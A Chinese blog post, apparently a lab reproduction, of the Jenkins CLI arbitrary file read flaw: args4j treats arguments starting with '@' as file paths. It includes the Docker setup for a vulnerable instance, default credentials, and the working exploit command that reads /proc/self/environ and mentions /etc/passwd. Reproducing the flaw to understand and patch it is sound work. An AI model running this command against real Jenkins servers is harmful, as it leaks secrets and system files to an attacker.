赞
踩
Jenkins提供了一个命令行的接口,用户可以在下载一个命令行客户端jenkins-cli.jar到本地,并调用该客户端来执行一些Jenkins的功能。本来是一个很常见的功能,但设计中神奇的是,用户使用jenkins-cli.jar时,命令行是传到服务端解析的,而不是在jenkins-cli.jar里解析。
这就导致了一个问题,因为Jenkins服务端解析命令行时使用了一个第三方库args4j,这个库实现了Linux中一个常见的功能——如果一个参数是以@开头,则会被自动认为是一个文件名,文件内容会被读取作为参数。
JenKins <= 2.441
Jenkins LTS <= 2.426.2
从Docker Hub上拉取一个名为bitnami/jenkins:2.426.2-debian-11-r3的Docker镜像。
docker pull bitnami/jenkins:2.426.2-debian-11-r3
运行一个Bitnami提供的Jenkins镜像,设置参数和端口映射,并启动镜像。
docker run -e "JAVA_OPTS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=0.0.0.0:5005" -d --name jenkins -p 8081:8080 -p 8777:5005 bitnami/jenkins:2.426.2-debian-11-r3
地址:kali本地IP:8081 默认管理员账号密码:user/bitnami
我们发现使用wget命令可以在外部将JenKins-cli.jar包下载至桌面
wget http://localhost:8081/jnlpJars/jenkins-cli.jar
通过Jenkins-cli.jar包进行 读取文件以获取 Jenkins 基本目录:
java -jar jenkins-cli.jar -s http://localhost:8081/ -http help 1 "@/proc/self/environ"
OK
利用JenKins-cli.jar包探索敏感目录文件;例如:/etc/passwd
在这里我们发现左边是只有一条是暴露。
开启匿名者访问权限
选项在后台的”Manage Jenkins“->"security"中管理员可将其开启或关闭。默认是关闭的。
这样使用JenKins-cli.jar包就可以无限制探索了。
Jenkins文件读取漏洞的原理是args4j在解析命令行的时候会把@后面的字符作为文件名,并读取文件内容作为参数的值。
但是作为攻击者,我们必须想办法让Jenkins或args4j,将读到的文件内容返回给我们,才能最终达到任意文件读取的目的。好在,当我们调用命令行时,如果出错,args4j就会把错误返回给客户端,而错误信息中就包含文件的内容。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。